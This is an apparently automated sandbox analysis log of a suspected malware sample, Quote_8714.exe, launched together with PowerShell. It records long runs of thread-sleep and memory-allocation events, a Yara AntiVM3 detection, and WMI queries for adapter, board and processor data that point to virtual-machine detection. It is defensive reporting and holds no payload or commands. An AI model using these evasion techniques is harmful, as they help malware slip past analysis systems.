Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Quote_8714.exe PID: 4464, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Quote_8714.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 8E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 7840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 9E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: AE30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6001	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3777	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Window / User API: threadDelayed 2122	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Window / User API: threadDelayed 7733	Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe TID: 6044	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7480	Thread sleep count: 2122 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7480	Thread sleep count: 7733 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98751s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98498s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97185s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96637s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96530s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96287s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -96159s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95799s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -95015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -94906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -94796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -94687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -94577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484	Thread sleep time: -94468s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Quote_8714.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quote_8714.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98751	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98498	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98390	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97843	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97515	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97406	Jump to behavior
